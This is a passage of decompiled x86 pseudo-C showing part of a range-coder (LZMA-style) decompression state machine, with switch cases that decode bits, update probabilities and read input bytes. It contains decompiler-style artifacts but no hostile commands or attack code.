                                      											case 4:
                                      												L133:
                                      												_t531 =  *_t606;
                                      												_t589 = _t531 & 0x0000ffff;
                                      												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                      												if( *(_t613 - 0xc) >= _t565) {
                                      													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                      													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                      													 *(_t613 - 0x40) = 1;
                                      													_t532 = _t531 - (_t531 >> 5);
                                      													 *_t606 = _t532;
                                      												} else {
                                      													 *(_t613 - 0x10) = _t565;
                                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                      													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                      												}
                                      												if( *(_t613 - 0x10) >= 0x1000000) {
                                      													goto L139;
                                      												}
                                      											case 5:
                                      												goto L137;
                                      											case 6:
                                      												__edx = 0;
                                      												__eflags =  *(__ebp - 0x40);
                                      												if( *(__ebp - 0x40) != 0) {
                                      													__eax =  *(__ebp - 4);
                                      													__ecx =  *(__ebp - 0x38);
                                      													 *(__ebp - 0x34) = 1;
                                      													 *(__ebp - 0x84) = 7;
                                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                      													while(1) {
                                      														L132:
                                      														 *(_t613 - 0x54) = _t606;
                                      														goto L133;
                                      													}
                                      												}
                                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                      												__esi =  *(__ebp - 0x60);
                                      												__cl = 8;
                                      												__cl = 8 -  *(__ebp - 0x3c);
                                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                      												__ecx =  *(__ebp - 0x3c);
                                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                      												__ecx =  *(__ebp - 4);
                                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                      												__eflags =  *(__ebp - 0x38) - 4;
                                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                      												if( *(__ebp - 0x38) >= 4) {
                                      													__eflags =  *(__ebp - 0x38) - 0xa;
                                      													if( *(__ebp - 0x38) >= 0xa) {
                                      														_t98 = __ebp - 0x38;
                                      														 *_t98 =  *(__ebp - 0x38) - 6;
                                      														__eflags =  *_t98;
                                      													} else {
                                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                      													}
                                      												} else {
                                      													 *(__ebp - 0x38) = 0;
                                      												}
                                      												__eflags =  *(__ebp - 0x34) - __edx;
                                      												if( *(__ebp - 0x34) == __edx) {
                                      													__ebx = 0;
                                      													__ebx = 1;
                                      													goto L61;
                                      												} else {
                                      													__eax =  *(__ebp - 0x14);
                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      													__eflags = __eax -  *(__ebp - 0x74);
                                      													if(__eax >=  *(__ebp - 0x74)) {
                                      														__eax = __eax +  *(__ebp - 0x74);
                                      														__eflags = __eax;
                                      													}
                                      													__ecx =  *(__ebp - 8);
                                      													__ebx = 0;
                                      													__ebx = 1;
                                      													__al =  *((intOrPtr*)(__eax + __ecx));
                                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                      													goto L41;
                                      												}
                                      											case 7:
                                      												__eflags =  *(__ebp - 0x40) - 1;
                                      												if( *(__ebp - 0x40) != 1) {
                                      													__eax =  *(__ebp - 0x24);
                                      													 *(__ebp - 0x80) = 0x16;
                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                      													__eax =  *(__ebp - 0x28);
                                      													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                      													__eax =  *(__ebp - 0x2c);
                                      													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                      													__eax = 0;
                                      													__eflags =  *(__ebp - 0x38) - 7;
                                      													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                      													__al = __al & 0x000000fd;
                                      													__eax = (__eflags >= 0) - 1 + 0xa;
                                      													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                      													__eax =  *(__ebp - 4);
                                      													__eax =  *(__ebp - 4) + 0x664;
                                      													__eflags = __eax;
                                      													 *(__ebp - 0x58) = __eax;
                                      													goto L69;
                                      												}
                                      												__eax =  *(__ebp - 4);
                                      												__ecx =  *(__ebp - 0x38);
                                      												 *(__ebp - 0x84) = 8;
                                      												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                      												while(1) {
                                      													L132:
                                      													 *(_t613 - 0x54) = _t606;
                                      													goto L133;
                                      												}
                                      											case 8:
                                      												__eflags =  *(__ebp - 0x40);
                                      												if( *(__ebp - 0x40) != 0) {
                                      													__eax =  *(__ebp - 4);
                                      													__ecx =  *(__ebp - 0x38);
                                      													 *(__ebp - 0x84) = 0xa;
                                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                      												} else {
                                      													__eax =  *(__ebp - 0x38);
                                      													__ecx =  *(__ebp - 4);
                                      													__eax =  *(__ebp - 0x38) + 0xf;
                                      													 *(__ebp - 0x84) = 9;
                                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                      												}
                                      												while(1) {
                                      													L132:
                                      													 *(_t613 - 0x54) = _t606;
                                      													goto L133;
                                      												}
                                      											case 9:
                                      												__eflags =  *(__ebp - 0x40);
                                      												if( *(__ebp - 0x40) != 0) {
                                      													goto L89;
                                      												}
                                      												__eflags =  *(__ebp - 0x60);
                                      												if( *(__ebp - 0x60) == 0) {
                                      													goto L171;
                                      												}
                                      												__eax = 0;
                                      												__eflags =  *(__ebp - 0x38) - 7;
                                      												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                      												__eflags = _t259;
                                      												0 | _t259 = _t259 + _t259 + 9;
                                      												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                      												goto L76;
                                      											case 0xa:
                                      												goto L0;
                                      											case 0xb:
                                      												__eflags =  *(__ebp - 0x40);
                                      												if( *(__ebp - 0x40) != 0) {
                                      													__ecx =  *(__ebp - 0x24);
                                      													__eax =  *(__ebp - 0x20);
                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                      												} else {
                                      													__eax =  *(__ebp - 0x24);
                                      												}
                                      												__ecx =  *(__ebp - 0x28);
                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                      												goto L88;
                                      											case 0xc:
                                      												L99:
                                      												__eflags =  *(__ebp - 0x6c);
                                      												if( *(__ebp - 0x6c) == 0) {
                                      													 *(__ebp - 0x88) = 0xc;
                                      													goto L170;
                                      												}
                                      												__ecx =  *(__ebp - 0x70);
                                      												__eax =  *(__ebp - 0xc);
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												_t334 = __ebp - 0x70;
                                      												 *_t334 =  *(__ebp - 0x70) + 1;
                                      												__eflags =  *_t334;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												__eax =  *(__ebp - 0x2c);
                                      												goto L101;
                                      											case 0xd:
                                      												L37:
                                      												__eflags =  *(__ebp - 0x6c);
                                      												if( *(__ebp - 0x6c) == 0) {
                                      													 *(__ebp - 0x88) = 0xd;
                                      													goto L170;
                                      												}
                                      												__ecx =  *(__ebp - 0x70);
                                      												__eax =  *(__ebp - 0xc);
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												_t122 = __ebp - 0x70;
                                      												 *_t122 =  *(__ebp - 0x70) + 1;
                                      												__eflags =  *_t122;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												L39:
                                      												__eax =  *(__ebp - 0x40);
                                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                      													goto L48;
                                      												}
                                      												__eflags = __ebx - 0x100;
                                      												if(__ebx >= 0x100) {
                                      													goto L54;
                                      												}
                                      												L41:
                                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                      												__ecx =  *(__ebp - 0x58);
                                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                      												 *(__ebp - 0x48) = __eax;
                                      												__eax = __eax + 1;
                                      												__eax = __eax << 8;
                                      												__eax = __eax + __ebx;
                                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      												__ax =  *__esi;
                                      												 *(__ebp - 0x54) = __esi;
                                      												__edx = __ax & 0x0000ffff;
                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                      												if( *(__ebp - 0xc) >= __ecx) {
                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      													__cx = __ax;
                                      													 *(__ebp - 0x40) = 1;
                                      													__cx = __ax >> 5;
                                      													__eflags = __eax;
                                      													__ebx = __ebx + __ebx + 1;
                                      													 *__esi = __ax;
                                      												} else {
                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                      													 *(__ebp - 0x10) = __ecx;
                                      													0x800 = 0x800 - __edx;
                                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                      													__ebx = __ebx + __ebx;
                                      													 *__esi = __cx;
                                      												}
                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      												 *(__ebp - 0x44) = __ebx;
                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                      													goto L39;
                                      												} else {
                                      													goto L37;
                                      												}
                                      											case 0xe:
                                      												L46:
                                      												__eflags =  *(__ebp - 0x6c);
                                      												if( *(__ebp - 0x6c) == 0) {
                                      													 *(__ebp - 0x88) = 0xe;
                                      													goto L170;
                                      												}
                                      												__ecx =  *(__ebp - 0x70);
                                      												__eax =  *(__ebp - 0xc);
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												_t156 = __ebp - 0x70;
                                      												 *_t156 =  *(__ebp - 0x70) + 1;
                                      												__eflags =  *_t156;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												while(1) {
                                      													L48:
                                      													__eflags = __ebx - 0x100;
                                      													if(__ebx >= 0x100) {
                                      														break;
                                      													}
                                      													__eax =  *(__ebp - 0x58);
                                      													__edx = __ebx + __ebx;
                                      													__ecx =  *(__ebp - 0x10);
                                      													__esi = __edx + __eax;
                                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                                      													__ax =  *__esi;
                                      													 *(__ebp - 0x54) = __esi;
                                      													__edi = __ax & 0x0000ffff;
                                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      													__eflags =  *(__ebp - 0xc) - __ecx;
                                      													if( *(__ebp - 0xc) >= __ecx) {
                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      														__cx = __ax;
                                      														_t170 = __edx + 1; // 0x1
                                      														__ebx = _t170;
                                      														__cx = __ax >> 5;
                                      														__eflags = __eax;
                                      														 *__esi = __ax;
                                      													} else {
                                      														 *(__ebp - 0x10) = __ecx;
                                      														0x800 = 0x800 - __edi;
                                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      														__ebx = __ebx + __ebx;
                                      														 *__esi = __cx;
                                      													}
                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      													 *(__ebp - 0x44) = __ebx;
                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                      														continue;
                                      													} else {
                                      														goto L46;
                                      													}
                                      												}
                                      												L54:
                                      												_t173 = __ebp - 0x34;
                                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                      												__eflags =  *_t173;
                                      												goto L55;
                                      											case 0xf:
                                      												L58:
                                      												__eflags =  *(__ebp - 0x6c);
                                      												if( *(__ebp - 0x6c) == 0) {
                                      													 *(__ebp - 0x88) = 0xf;
                                      													goto L170;
                                      												}
                                      												__ecx =  *(__ebp - 0x70);
                                      												__eax =  *(__ebp - 0xc);
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												_t203 = __ebp - 0x70;
                                      												 *_t203 =  *(__ebp - 0x70) + 1;
                                      												__eflags =  *_t203;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												L60:
                                      												__eflags = __ebx - 0x100;
                                      												if(__ebx >= 0x100) {
                                      													L55:
                                      													__al =  *(__ebp - 0x44);
                                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                      													goto L56;
                                      												}
                                      												L61:
                                      												__eax =  *(__ebp - 0x58);
                                      												__edx = __ebx + __ebx;
                                      												__ecx =  *(__ebp - 0x10);
                                      												__esi = __edx + __eax;
                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                      												__ax =  *__esi;
                                      												 *(__ebp - 0x54) = __esi;
                                      												__edi = __ax & 0x0000ffff;
                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                      												if( *(__ebp - 0xc) >= __ecx) {
                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      													__cx = __ax;
                                      													_t217 = __edx + 1; // 0x1
                                      													__ebx = _t217;
                                      													__cx = __ax >> 5;
                                      													__eflags = __eax;
                                      													 *__esi = __ax;
                                      												} else {
                                      													 *(__ebp - 0x10) = __ecx;
                                      													0x800 = 0x800 - __edi;
                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      													__ebx = __ebx + __ebx;
                                      													 *__esi = __cx;
                                      												}
                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      												 *(__ebp - 0x44) = __ebx;
                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                      													goto L60;
                                      												} else {
                                      													goto L58;
                                      												}
                                      											case 0x10:
                                      												L109:
                                      												__eflags =  *(__ebp - 0x6c);
                                      												if( *(__ebp - 0x6c) == 0) {
                                      													 *(__ebp - 0x88) = 0x10;
                                      													goto L170;
                                      												}
                                      												__ecx =  *(__ebp - 0x70);
                                      												__eax =  *(__ebp - 0xc);
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												_t365 = __ebp - 0x70;
                                      												 *_t365 =  *(__ebp - 0x70) + 1;
                                      												__eflags =  *_t365;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												goto L111;
                                      											case 0x11:
                                      												goto L69;
                                      											case 0x12:
                                      												__eflags =  *(__ebp - 0x40);
                                      												if( *(__ebp - 0x40) != 0) {
                                      													__eax =  *(__ebp - 0x58);
                                      													 *(__ebp - 0x84) = 0x13;
                                      													__esi =  *(__ebp - 0x58) + 2;
                                      													while(1) {
                                      														L132:
                                      														 *(_t613 - 0x54) = _t606;
                                      														goto L133;
                                      													}
                                      												}
                                      												__eax =  *(__ebp - 0x4c);
                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                      												__ecx =  *(__ebp - 0x58);
                                      												__eax =  *(__ebp - 0x4c) << 4;
                                      												__eflags = __eax;
                                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                                      												goto L130;
                                      											case 0x13:
                                      												__eflags =  *(__ebp - 0x40);
                                      												if( *(__ebp - 0x40) != 0) {
                                      													_t469 = __ebp - 0x58;
                                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                      													__eflags =  *_t469;
                                      													 *(__ebp - 0x30) = 0x10;
                                      													 *(__ebp - 0x40) = 8;
                                      													L144:
                                      													 *(__ebp - 0x7c) = 0x14;
                                      													goto L145;
                                      												}
                                      												__eax =  *(__ebp - 0x4c);
                                      												__ecx =  *(__ebp - 0x58);
                                      												__eax =  *(__ebp - 0x4c) << 4;
                                      												 *(__ebp - 0x30) = 8;
                                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                      												L130:
                                      												 *(__ebp - 0x58) = __eax;
                                      												 *(__ebp - 0x40) = 3;
                                      												goto L144;
                                      											case 0x14:
                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                      												__eax =  *(__ebp - 0x80);
                                      												 *(_t613 - 0x88) = _t533;
                                      												goto L1;
                                      											case 0x15:
                                      												__eax = 0;
                                      												__eflags =  *(__ebp - 0x38) - 7;
                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                      												__al = __al & 0x000000fd;
                                      												__eax = (__eflags >= 0) - 1 + 0xb;
                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                      												goto L120;
                                      											case 0x16:
                                      												__eax =  *(__ebp - 0x30);
                                      												__eflags = __eax - 4;
                                      												if(__eax >= 4) {
                                      													_push(3);
                                      													_pop(__eax);
                                      												}
                                      												__ecx =  *(__ebp - 4);
                                      												 *(__ebp - 0x40) = 6;
                                      												__eax = __eax << 7;
                                      												 *(__ebp - 0x7c) = 0x19;
                                      												 *(__ebp - 0x58) = __eax;
                                      												goto L145;
                                      											case 0x17:
                                      												L145:
                                      												__eax =  *(__ebp - 0x40);
                                      												 *(__ebp - 0x50) = 1;
                                      												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                      												goto L149;
                                      											case 0x18:
                                      												L146:
                                      												__eflags =  *(__ebp - 0x6c);
                                      												if( *(__ebp - 0x6c) == 0) {
                                      													 *(__ebp - 0x88) = 0x18;
                                      													goto L170;
                                      												}
                                      												__ecx =  *(__ebp - 0x70);
                                      												__eax =  *(__ebp - 0xc);
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												_t484 = __ebp - 0x70;
                                      												 *_t484 =  *(__ebp - 0x70) + 1;
                                      												__eflags =  *_t484;
                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      												L148:
                                      												_t487 = __ebp - 0x48;
                                      												 *_t487 =  *(__ebp - 0x48) - 1;
                                      												__eflags =  *_t487;
                                      												L149:
                                      												__eflags =  *(__ebp - 0x48);
                                      												if( *(__ebp - 0x48) <= 0) {
                                      													__ecx =  *(__ebp - 0x40);
                                      													__ebx =  *(__ebp - 0x50);
                                      													0 = 1;
                                      													__eax = 1 << __cl;
                                      													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                      													__eax =  *(__ebp - 0x7c);
                                      													 *(__ebp - 0x44) = __ebx;
                                      													while(1) {
                                      														 *(_t613 - 0x88) = _t533;
                                      														goto L1;
                                      													}
                                      												}
                                      												__eax =  *(__ebp - 0x50);
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                      												__eax =  *(__ebp - 0x58);
                                      												__esi = __edx + __eax;
                                      												 *(__ebp - 0x54) = __esi;
                                      												__ax =  *__esi;
                                      												__edi = __ax & 0x0000ffff;
                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                      												if( *(__ebp - 0xc) >= __ecx) {
                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      													__cx = __ax;
                                      													__cx = __ax >> 5;
                                      													__eax = __eax - __ecx;
                                      													__edx = __edx + 1;
                                      													__eflags = __edx;
                                      													 *__esi = __ax;
                                      													 *(__ebp - 0x50) = __edx;
                                      												} else {
                                      													 *(__ebp - 0x10) = __ecx;
                                      													0x800 = 0x800 - __edi;
                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                      													 *__esi = __cx;
                                      												}
                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                      													goto L148;
                                      												} else {
                                      													goto L146;
                                      												}
                                      											case 0x19:
                                      												__eflags = __ebx - 4;
                                      												if(__ebx < 4) {
                                      													 *(__ebp - 0x2c) = __ebx;
                                      													L119:
                                      													_t393 = __ebp - 0x2c;
                                      													 *_t393 =  *(__ebp - 0x2c) + 1;
                                      													__eflags =  *_t393;
                                      													L120:
                                      													__eax =  *(__ebp - 0x2c);
                                      													__eflags = __eax;
                                      													if(__eax == 0) {
                                      														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                      														goto L170;
                                      													}
                                      													__eflags = __eax -  *(__ebp - 0x60);
                                      													if(__eax >  *(__ebp - 0x60)) {
                                      														goto L171;
                                      													}
                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                      													__eax =  *(__ebp - 0x30);
                                      													_t400 = __ebp - 0x60;
                                      													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                      													__eflags =  *_t400;
                                      													goto L123;
                                      												}
                                      												__ecx = __ebx;
                                      												__eax = __ebx;
                                      												__ecx = __ebx >> 1;
                                      												__eax = __ebx & 0x00000001;
                                      												__ecx = (__ebx >> 1) - 1;
                                      												__al = __al | 0x00000002;
                                      												__eax = (__ebx & 0x00000001) << __cl;
                                      												__eflags = __ebx - 0xe;
                                      												 *(__ebp - 0x2c) = __eax;
                                      												if(__ebx >= 0xe) {
                                      													__ebx = 0;
                                      													 *(__ebp - 0x48) = __ecx;
                                      													L102:
                                      													__eflags =  *(__ebp - 0x48);
                                      													if( *(__ebp - 0x48) <= 0) {
                                      														__eax = __eax + __ebx;
                                      														 *(__ebp - 0x40) = 4;
                                      														 *(__ebp - 0x2c) = __eax;
                                      														__eax =  *(__ebp - 4);
                                      														__eax =  *(__ebp - 4) + 0x644;
                                      														__eflags = __eax;
                                      														L108:
                                      														__ebx = 0;
                                      														 *(__ebp - 0x58) = __eax;
                                      														 *(__ebp - 0x50) = 1;
                                      														 *(__ebp - 0x44) = 0;
                                      														 *(__ebp - 0x48) = 0;
                                      														L112:
                                      														__eax =  *(__ebp - 0x40);
                                      														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                      														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                      															_t391 = __ebp - 0x2c;
                                      															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                      															__eflags =  *_t391;
                                      															goto L119;
                                      														}
                                      														__eax =  *(__ebp - 0x50);
                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                      														__eax =  *(__ebp - 0x58);
                                      														__esi = __edi + __eax;
                                      														 *(__ebp - 0x54) = __esi;
                                      														__ax =  *__esi;
                                      														__ecx = __ax & 0x0000ffff;
                                      														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                      														__eflags =  *(__ebp - 0xc) - __edx;
                                      														if( *(__ebp - 0xc) >= __edx) {
                                      															__ecx = 0;
                                      															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                      															__ecx = 1;
                                      															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                      															__ebx = 1;
                                      															__ecx =  *(__ebp - 0x48);
                                      															__ebx = 1 << __cl;
                                      															__ecx = 1 << __cl;
                                      															__ebx =  *(__ebp - 0x44);
                                      															__ebx =  *(__ebp - 0x44) | __ecx;
                                      															__cx = __ax;
                                      															__cx = __ax >> 5;
                                      															__eax = __eax - __ecx;
                                      															__edi = __edi + 1;
                                      															__eflags = __edi;
                                      															 *(__ebp - 0x44) = __ebx;
                                      															 *__esi = __ax;
                                      															 *(__ebp - 0x50) = __edi;
                                      														} else {
                                      															 *(__ebp - 0x10) = __edx;
                                      															0x800 = 0x800 - __ecx;
                                      															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                      															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                      															 *__esi = __dx;
                                      														}
                                      														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      														if( *(__ebp - 0x10) >= 0x1000000) {
                                      															L111:
                                      															_t368 = __ebp - 0x48;
                                      															 *_t368 =  *(__ebp - 0x48) + 1;
                                      															__eflags =  *_t368;
                                      															goto L112;
                                      														} else {
                                      															goto L109;
                                      														}
                                      													}
                                      													__ecx =  *(__ebp - 0xc);
                                      													__ebx = __ebx + __ebx;
                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                      													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                      													 *(__ebp - 0x44) = __ebx;
                                      													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                      														__ecx =  *(__ebp - 0x10);
                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                      														__ebx = __ebx | 0x00000001;
                                      														__eflags = __ebx;
                                      														 *(__ebp - 0x44) = __ebx;
                                      													}
                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                      														L101:
                                      														_t338 = __ebp - 0x48;
                                      														 *_t338 =  *(__ebp - 0x48) - 1;
                                      														__eflags =  *_t338;
                                      														goto L102;
                                      													} else {
                                      														goto L99;
                                      													}
                                      												}
                                      												__edx =  *(__ebp - 4);
                                      												__eax = __eax - __ebx;
                                      												 *(__ebp - 0x40) = __ecx;
                                      												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                      												goto L108;
                                      											case 0x1a:
                                      												L56:
                                      												__eflags =  *(__ebp - 0x64);
                                      												if( *(__ebp - 0x64) == 0) {
                                      													 *(__ebp - 0x88) = 0x1a;
                                      													goto L170;
                                      												}
                                      												__ecx =  *(__ebp - 0x68);
                                      												__al =  *(__ebp - 0x5c);
                                      												__edx =  *(__ebp - 8);
                                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
